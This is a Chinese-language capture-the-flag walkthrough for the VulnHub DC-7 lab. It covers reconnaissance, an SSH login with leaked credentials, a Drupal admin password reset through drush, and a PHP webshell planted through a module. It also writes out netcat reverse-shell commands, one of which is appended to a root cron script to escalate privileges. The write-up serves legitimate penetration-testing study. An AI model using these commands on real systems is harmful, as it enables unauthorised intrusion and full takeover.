DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
While this isn't an overly technical challenge, it isn't exactly easy.
While it's kind of a logical progression from an earlier DC release (I won't tell you which one), there are some new concepts involved, but you will need to figure those out for yourself. :-) If you need to resort to brute forcing or dictionary attacks, you probably won't succeed.
What you will need to do, is to think "outside" of the box.
Waaaaaay "outside" of the box. :-)
The ultimate goal of this challenge is to get root and to read the one and only flag.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.
只有一个flag
https://www.vulnhub.com/entry/dc-7,356/
虚拟机开启之后界面如上,我们不知道ip,需要自己探活,网段知道:192.168.52.0/24
目标就是我们搭建的靶场,靶场IP为:192.168.52.0/24
nmap -sP 192.168.52.0/24
arp-scan -l
我们知道靶场ip地址为192.168.52.129
nmap -A -V -P- 192.168.52.129
发现开放了80端口,存在web服务,Apache httpd 2.4.25 (Debian)
发现开放了22端口,OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
也可以使用masscan探活端口
masscan --rate=10000 --ports 0-65535 192.168.52.129
http://192.168.52.129
我们通过wappalyzer发现cms是Drupal 8
./EHole_linux_amd64 finger -u http://192.168.52.129
使用棱洞3.0指纹识别发现有Drupal
nikto -h http://192.168.52.129
使用nikto工具扫描网站结构,发现robots.txt
可以看到是一些登录页面
http://192.168.52.129/index.php/user/login
我们想的是暴力破解,但是题目提示我们不能暴力破解
’
那么这个办法就行不通,我们试试Drupal8漏洞
我们使用kali进行搜索Drupal8
searchsploit Drupal 8
找了一些Drupal 8 的漏洞 但是好像都不符合。
我们查看题目提示,说到谷歌可以提供很大的帮助,那么我们使用谷歌进行搜索
我们再次查看页面,可以看到@DC7USER,我们进行搜索
我们进行查看
我们在config.php里面发现是用户名和密码,而且靶场开启了22端口,我们进行ssh
ssh [email protected]
发现可以登录成功
我们查看里面的文件,发现有两个文件
ls
我们切换到backups文件夹当中,有两个加密的文件。
我们查看mbox文件,发现里面有一个定时任务 用root 运行/opt/scripts/backups.sh。
查看下权限什么的,发现www-data拥有执行和写的权限,我们当前权限没有写权限,看来没办法动手脚了。
但是如果我们获得了www-data的shell 那就可以写点东西进去,然后依靠计划任务,用root去运行,那么我们可以获得了root权限的shell了。
我们查看backups.sh
cat backups.sh
可以看到命令是进入 cd /var/www/html/ 后执行drush。然后去百度看看 drush是干什么呢?
这里有写一些drush基本语法。
https://www.howtoing.com/a-beginner-s-guide-to-drush-the-drupal-shell
drush user-password admin --password="new_pass"
#想要更改您的密码?就这么简单。
#记得执行命令前先切换到Drupal的目录下面。
cd /var/www/html/
#Drupal默认账户是admin,ms02423是我设置的密码
drush user-password admin --password="ms02423"
这样就修改成功了,这里ssh登录就是为了修改后台密码
我们可以看到登录成功
进入到后台管理页面 然后就找写webshell的地方了
发现Content里面可以编辑文章,依次点击Manage ——> Content ——> Add content ——> Basic page功能,尝试添加php一句话,但发现Drupal 8后为了安全需要将php单独作为一个模块导入;
发现Extend里面可以安装新模块 试试可不可以安装php。
php 插件下载地址
https://ftp.drupal.org/files/projects/php-8.x-1.x-dev.tar.gz
不知道为什么我的靶场php安装不成功,试了好多次都没有成功,所以后面的内容就没有办法写了
我在网上找了一篇wp,链接地址为
https://blog.csdn.net/qq_34028816/article/details/124572886
后面的内容因为我没有环境所以直接复制粘贴(ip地址为博主的ip地址)
安装成功
点击Enable newly added modules激活模块
点击前面的三角将前几栏折回,找到PHP Filetr勾选
并且点击install
我们可以看到安装成功
我们写入一句话木马
我们连接蚁剑,可以看到连接成功
kali端先监听
nc -lvnp 4444
蚁剑终端
nc -e /bin/sh 192.168.1.11 4444
我们可以看到监听成功
打开交互模式
python -c 'import pty;pty.spawn("/bin/bash")'
提权想到之前那个脚本
有权限
kali再监听一个端口
nc -lvnp 6666
将反弹shell写入脚本
echo "nc -e /bin/bash 192.168.1.11 6666" >> /opt/scripts/backups.sh
然后再执行脚本
提权到root
1.靶场下载地址
2.nmap
3.arp-scan
4.masscan
5.[ 常用工具篇 ] 渗透神器 whatweb 安装使用详解
6.[ 渗透工具篇 ] EHole(棱洞)3.0安装部署及详解(linux & win)
7.nikto工具的使用
8.[ 隧道技术 ] 反弹shell的集中常见方式(一)nc反弹shell
9.实现交互式shell的几种方式
10.ssh登录
11.蚁剑的使用